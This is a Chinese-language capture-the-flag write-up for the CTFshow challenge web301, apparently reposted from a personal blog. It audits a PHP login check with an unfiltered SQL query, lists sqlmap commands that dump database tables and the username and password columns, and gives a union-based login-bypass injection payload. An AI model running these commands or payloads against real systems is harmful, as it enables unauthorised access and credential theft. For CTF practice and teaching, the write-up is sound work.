【原创】CTFshow—代码审计

admin 2022年12月3日16:27:46评论22 views字数 708阅读2分21秒阅读模式

[huayang]

该来的还是要来

分享个代码审计的工具Seay

链接: https://pan.baidu.com/s/1Bf4CzqN2Dk1NjCpnC2laXA 密码: c99g

web301

【原创】CTFshow—代码审计

下载源码审计看看

【原创】CTFshow—代码审计

我审nm个*****

去看看检测登录的checklogin.php文件

sql语句没有任何过滤

【原创】CTFshow—代码审计

sqlmap跑一下

因为这里看不见注入点

所以就需要用bp抓包引入数据

复制数据保存为test.txt文件

python3 sqlmap.py -r test.txt --dbs
【原创】CTFshow—代码审计
python3 sqlmap.py -r test.txt -D sds --tables --batch
【原创】CTFshow—代码审计
python3 sqlmap.py -r test.txt -D sds -T sds_user  --columns --batch
【原创】CTFshow—代码审计
python3 sqlmap.py -r test.txt -D sds -T sds_user  -C sds_password --dump --batch
【原创】CTFshow—代码审计
python3 sqlmap.py -r test.txt -D sds -T sds_user  -C sds_username --dump --batch
【原创】CTFshow—代码审计
【原创】CTFshow—代码审计

当然也可以直接使用sqlmap表单查询搞下来,只不过时间有点久

python3 sqlmap.py -u http://396c27a6-b4b7-4010-880a-b51531e43147.chall.ctf.show/login.php  --forms --batch --dump
【原创】CTFshow—代码审计

方法二

具体可参照https://hellohy.top/huayang/658.html

【原创】CTFshow—代码审计
userid='union select'1'#&userpwd=1

[/huayang]

FROM:浅浅淡淡[hellohy]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月3日16:27:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【原创】CTFshow—代码审计https://cn-sec.com/archives/1443033.html

发表评论

匿名网友 填写信息